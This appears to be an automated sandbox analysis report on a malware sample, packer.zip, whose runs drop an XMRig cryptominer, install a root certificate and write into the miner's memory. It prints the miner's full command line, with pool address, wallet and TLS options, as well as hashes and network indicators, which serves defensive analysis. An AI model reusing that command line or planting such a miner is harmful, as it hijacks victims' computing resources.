Analysis Overview
SHA256
2712cfc84e57a8c2c3637bc69d65c1741fcb7a600c78709bbe3d47c5f76a4293
Threat Level: Known bad
The file packer.zip was found to be: Known bad.
Malicious Activity Summary
XMRig Miner payload
xmrig
Executes dropped EXE
Unsigned PE
Modifies system certificate store
Suspicious use of WriteProcessMemory
Suspicious behavior: LoadsDriver
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-13 23:23
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:13
Platform
win10v2004-20240611-en
Max time kernel
1792s
Max time network
1801s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data elided] | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data elided] | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 1492 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 1492 wrote to memory of 3108 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 0.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.179.89.13.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| Hash | Value |
| --- | --- |
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3108-14-0x000002BEA3410000-0x000002BEA3430000-memory.dmp
memory/3108-15-0x000002BEA4F20000-0x000002BEA4F40000-memory.dmp
memory/3108-16-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-18-0x000002BF37910000-0x000002BF37930000-memory.dmp
memory/3108-17-0x000002BF376E0000-0x000002BF37700000-memory.dmp
memory/3108-19-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-20-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-23-0x000002BF37910000-0x000002BF37930000-memory.dmp
memory/3108-22-0x000002BF376E0000-0x000002BF37700000-memory.dmp
memory/3108-21-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-24-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-25-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-26-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-27-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-28-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-29-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-30-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-31-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-32-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-33-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-34-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-35-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-36-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-37-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-38-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-39-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-40-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-41-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-42-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-43-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-44-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-45-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-46-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-47-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-48-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-49-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-50-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-51-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-52-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-53-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-54-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-55-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-56-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-57-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-58-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-59-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-60-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-61-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-62-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-63-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-64-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-65-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-66-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-67-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-68-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-69-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-70-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-71-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-72-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-73-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-74-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-75-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-76-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-77-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-78-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-79-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-80-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-81-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
memory/3108-82-0x00007FF6A0A20000-0x00007FF6A1523000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:41
Platform
win10v2004-20240611-en
Max time kernel
1794s
Max time network
1806s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data elided] | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data elided] | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 4912 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 4912 wrote to memory of 2968 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4216,i,7869973516895866428,11647313872437892197,262144 --variations-seed-version --mojo-platform-channel-handle=4156 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4052,i,7869973516895866428,11647313872437892197,262144 --variations-seed-version --mojo-platform-channel-handle=4432 /prefetch:8
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 13.107.21.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| BE | 88.221.83.185:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| Hash | Value |
| --- | --- |
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/2968-14-0x000001B37ADD0000-0x000001B37ADF0000-memory.dmp
memory/2968-15-0x000001B37C6D0000-0x000001B37C6F0000-memory.dmp
memory/2968-16-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-18-0x000001B37C710000-0x000001B37C730000-memory.dmp
memory/2968-17-0x000001B37C6F0000-0x000001B37C710000-memory.dmp
memory/2968-19-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-20-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-23-0x000001B37C710000-0x000001B37C730000-memory.dmp
memory/2968-22-0x000001B37C6F0000-0x000001B37C710000-memory.dmp
memory/2968-21-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-24-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-25-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-26-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-27-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-28-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-29-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-30-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-31-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-32-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-33-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-34-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-35-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-36-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-37-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-38-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-39-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-40-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-41-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-42-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-43-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-44-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-45-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-46-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-47-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-48-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-49-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-50-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-51-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-52-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-53-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-54-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-55-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-56-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-57-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-58-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-59-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-60-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-61-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-62-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-63-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-64-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-65-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-66-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-67-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-68-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-69-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-70-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-71-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-72-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-73-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-74-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-75-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-76-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-77-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-78-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-79-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-80-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-81-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
memory/2968-82-0x00007FF6AC760000-0x00007FF6AD263000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:41
Platform
win10v2004-20240508-en
Max time kernel
1550s
Max time network
1563s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (4).exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 23.53.113.159:80 | N/A | tcp |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral10
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:42
Platform
win10v2004-20240508-en
Max time kernel
1660s
Max time network
1673s
Command Line
Signatures
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (6) - Copy.exe"
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | github.com | udp |
Files
Analysis: behavioral15
Detonation Overview
Submitted
2024-06-13 23:22
Reported
2024-06-14 13:43
Platform
win10v2004-20240226-en
Max time kernel
1797s
Max time network
1807s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data elided] | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = [blob data elided] | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| --- | --- | --- | --- |
| PID 228 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 228 wrote to memory of 4456 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (8).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5056 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4208 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:8
Network
| Country | Destination | Domain | Proto |
| --- | --- | --- | --- |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.58.20.217.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 216.58.212.234:443 | chromewebstore.googleapis.com | tcp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.212.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.73.50.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.242.123.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 23.35.229.160:80 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.229.35.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.33.209.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.161.192.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.229.35.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.110.54.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
